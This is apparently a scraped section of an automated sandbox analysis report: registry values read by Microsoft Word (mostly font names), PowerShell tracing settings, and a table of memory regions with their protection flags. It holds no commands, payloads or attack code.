C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Narrow
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Rounded MT Bold
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Unicode MS
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Baskerville Old Face
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Batang
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BatangChe
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bauhaus 93
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bell MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB Demi
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bernard MT Condensed
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Blackadder ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Black
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Condensed
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Poster Compressed
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Book Antiqua
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookman Old Style
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookshelf Symbol 7
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bradley Hand ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Britannic Bold
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Broadway
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Browallia New
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BrowalliaUPC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Brush Script MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri Light
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Californian FB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calisto MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Candara
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Castellar
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Centaur
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Gothic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Schoolbook
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Chiller
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Colonna MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Comic Sans MS
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Consolas
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Constantia
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cooper Black
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Bold
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Light
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Corbel
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cordia New
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
CordiaUPC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Courier New
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Curlz MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DaunPenh
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
David
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DFKai-SB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DilleniaUPC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DokChampa
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Dotum
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DotumChe
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ebrima
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Edwardian Script ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Elephant
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Engravers MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Bold ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Demi ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Light ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Medium ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Estrangelo Edessa
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EucrosiaUPC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Euphemia
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FangSong
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Felix Titling
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Footlight MT Light
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Forte
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Book
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi Cond
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Heavy
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium Cond
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FrankRuehl
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FreesiaUPC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Freestyle Script
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
French Script MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gabriola
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Garamond
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gautami
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Georgia
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gigi
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Condensed
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Ext Condensed Bold
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold Condensed
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gisha
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gloucester MT Extra Condensed
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Old Style
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Stout
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gulim
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GulimChe
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gungsuh
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GungsuhChe
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Haettenschweiler
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harlow Solid Italic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harrington
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
High Tower Text
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Impact
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Imprint MT Shadow
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Informal Roman
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
IrisUPC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Iskoola Pota
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
JasmineUPC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Jokerman
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Juice ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KaiTi
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kalinga
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kartika
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Khmer UI
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KodchiangUPC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kokila
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kristen ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kunstler Script
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lao UI
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Latha
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Leelawadee
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Levenim MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LilyUPC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Bright
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Calligraphy
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Console
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Fax
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Handwriting
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Typewriter
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Unicode
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Magneto
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Maiandra GD
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Malgun Gothic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mangal
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Marlett
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Matura MT Script Capitals
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo UI
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Himalaya
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft JhengHei
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft New Tai Lue
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft PhagsPa
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Sans Serif
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Tai Le
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Uighur
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft YaHei
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Yi Baiti
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS-ExtB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU-ExtB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam Fixed
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mistral
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Modern No. 20
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mongolian Baiti
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Monotype Corsiva
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MoolBoran
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Gothic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Mincho
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Outlook
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PGothic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PMincho
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Sans Serif
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Specialty
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS UI Gothic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MT Extra
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MV Boli
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Narkisim
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Engraved
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Solid
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NSimSun
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Nyala
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
OCR A Extended
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Old English Text MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Onyx
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palace Script MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palatino Linotype
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Papyrus
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Parchment
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua Titling MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Plantagenet Cherokee
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Playbill
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU-ExtB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Poor Richard
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Pristina
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Raavi
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rage Italic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ravie
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Condensed
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Extra Bold
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rod
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sakkal Majalla
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Script MT Bold
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Print
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Script
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Light
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Semibold
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Symbol
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shonar Bangla
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Showcard Gothic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shruti
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimHei
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic Fixed
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun-ExtB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Snap ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Stencil
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sylfaen
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Symbol
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tempus Sans ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Times New Roman
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Traditional Arabic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Trebuchet MS
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tunga
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed Extra Bold
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Utsaah
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vani
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Verdana
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vijaya
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Viner Hand ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vivaldi
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vladimir Script
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vrinda
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Webdings
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wide Latin
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 2
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 3
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F7262
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LastPurgeTime
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
WORDFiles
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F7262
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Settings
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ZoomApp
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTF
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTA
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
|
|
|
C:\Windows\SysWOW64\rundll32.exe
|
SavedLegacySettings
|
|
There are 326 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
161000
|
unkown
|
page execute read
|
|
|
|
1D1000
|
unkown
|
page execute read
|
|
|
|
190000
|
unkown
|
page execute and read and write
|
|
|
|
250000
|
unkown
|
page execute and read and write
|
|
|
|
261000
|
unkown
|
page execute read
|
|
|
|
B21000
|
unkown
|
page execute read
|
|
|
|
1B0000
|
unkown
|
page execute and read and write
|
|
|
|
241000
|
unkown
|
page execute read
|
|
|
|
140000
|
unkown
|
page execute and read and write
|
|
|
|
6A1000
|
unkown
|
page execute read
|
|
|
|
150000
|
unkown
|
page execute and read and write
|
|
|
|
1B1000
|
unkown
|
page execute read
|
|
|
|
220000
|
unkown
|
page execute and read and write
|
|
|
|
1F1000
|
unkown
|
page execute read
|
|
|
|
190000
|
unkown
|
page execute and read and write
|
|
|
|
1B1000
|
unkown
|
page execute read
|
|
|
|
1E0000
|
unkown
|
page execute and read and write
|
|
|
|
190000
|
unkown
|
page execute and read and write
|
|
|
|
4A0000
|
unkown
|
page readonly
|
|
|
|
3AF000
|
heap default
|
page read and write
|
|
|
|
2AB0000
|
unkown
|
page read and write
|
|
|
|
12EB1000
|
unkown
|
page read and write
|
|
|
|
25EC000
|
unkown
|
page read and write
|
|
|
|
1F0000
|
unkown
|
page readonly
|
|
|
|
737000
|
heap default
|
page read and write
|
|
|
|
12F90000
|
unkown
|
page read and write
|
|
|
|
7FF00102000
|
unkown
|
page execute and read and write
|
|
|
|
28AF000
|
stack
|
page read and write
|
|
|
|
1B481000
|
unkown
|
page read and write
|
|
|
|
3030000
|
heap private
|
page read and write
|
|
|
|
1B4B3000
|
unkown
|
page read and write
|
|
|
|
4C0000
|
heap default
|
page read and write
|
|
|
|
A30000
|
unkown
|
page read and write
|
|
|
|
3ADE000
|
unkown
|
page read and write
|
|
|
|
30E000
|
unkown
|
page read and write
|
|
|
|
1F70000
|
unkown
|
page readonly
|
|
|
|
84E000
|
unkown
|
page read and write
|
|
|
|
950000
|
heap private
|
page read and write
|
